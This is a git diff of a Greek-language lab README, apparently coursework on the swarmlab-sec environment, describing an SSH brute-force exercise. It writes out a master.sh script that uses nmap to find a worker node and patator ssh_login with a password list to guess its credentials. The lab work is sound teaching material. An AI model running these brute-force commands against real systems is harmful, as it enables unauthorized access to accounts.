Browse Source

Update '2. SSH Brute Force/README.md'

master
AndreasNefeli 4 years ago
parent
commit
a46fb2c68c
  1. 18
      2. SSH Brute Force/README.md

18
2. SSH Brute Force/README.md

@ -12,27 +12,33 @@
4. git clone https://github.com/lanjelot/patator.git** 4. git clone https://github.com/lanjelot/patator.git**
_______________________________________________________________________________________ _______________________________________________________________________________________
Αφού ολοκλρωθεί η εγκατάσταση, συνδεόμαστε στον master, από τον οποίο θα υλοποιηθεί και η επίθεση. Αφού ολοκλρωθεί η εγκατάσταση, συνδεόμαστε στον master, από τον οποίο θα υλοποιηθεί και η επίθεση.
**1. sudo ../swarmlab-sec/install/usr/share/swarmlab.io/sec/swarmlab-sec login** **sudo ../swarmlab-sec/install/usr/share/swarmlab.io/sec/swarmlab-sec login**
**Σημείωση:** Προκειμένου να μάθουμε ποια εντολή πρέπει να χρησιμοποιήσουμε για τη συγκεκριμένη επίθεση, ανατρέξαμε στο documentation της patator, μέσω των εντολών:
**1. python patator.py
2. python patator.py ssh_login** (καθώς αυτή είναι η επίθεση που μας ενδιαφέρει.)
Έπειτα, δημιουργήσαμε και τρέξαμε ένα script master.sh, το οποίο περιέχει όλες τις εντολές για την υλοποιήση της επίθεσης. Έπειτα, δημιουργήσαμε και τρέξαμε ένα script master.sh, το οποίο περιέχει όλες τις εντολές για την υλοποιήση της επίθεσης.
**2. ./master.sh** **./master.sh**
**master.sh** **master.sh**
* H my_ip περιέχει την ip διεύθυνση του master. * H my_ip περιέχει την ip διεύθυνση του master.
**my_ip=$(ifconfig eth0 | grep 'inet' | cut -d: -f2 | awk '{print $2}')** **my_ip=$(ifconfig eth0 | grep 'inet' | cut -d: -f2 | awk '{print $2}')**
*H network περιέχει την ip του δικτύου, την οποία χρησιμοποιούμε για να βρούμε την ip του worker, στον οποίο θα επιτεθούμε. *H network περιέχει την ip του δικτύου, την οποία χρησιμοποιούμε για να βρούμε την ip του worker, στον οποίο θα επιτεθούμε.
**network=$(echo $my_ip | sed 's/.[0-9]$/.*/')** **network=$(echo $my_ip | sed 's/.[0-9]$/.*/')**
* Στη μεταβλητή worker περιέχεται η ip του πρώτου worker, όπως αυτός υπάρχει στο σμήνος. Εάν θέλουμε να επιτεθούμε σε κάποιον άλλο worker, θα βάλουμε το επιθυμητό ψηφίο στην παράμετρο **grep worker_ψηφίο**. * Στη μεταβλητή worker περιέχεται η ip του πρώτου worker, όπως αυτός υπάρχει στο σμήνος. Εάν θέλουμε να επιτεθούμε σε κάποιον άλλο worker, θα βάλουμε το επιθυμητό ψηφίο στην παράμετρο **grep worker_ψηφίο**.
**worker=$(nmap -sP $network | grep worker_1 | awk '{print $NF}' | tr -d '()')** **worker=$(nmap -sP $network | grep worker_1 | awk '{print $NF}' | tr -d '()')**
* Με την ακόλουθη εντολή εκτελείτε η επίθεση.
**patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker** **patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker**
#emfanizei kai tis apotyximenes prospatheies #emfanizei kai tis apotyximenes prospatheies
#patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker -x ignore:mesg='Authentication failed.' #patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker -x ignore:mesg='Authentication failed.'
#emfanizei mono tin epithesi ston kwdiko pou isxuei #emfanizei mono tin epithesi ston kwdiko pou isxuei

Loading…
Cancel
Save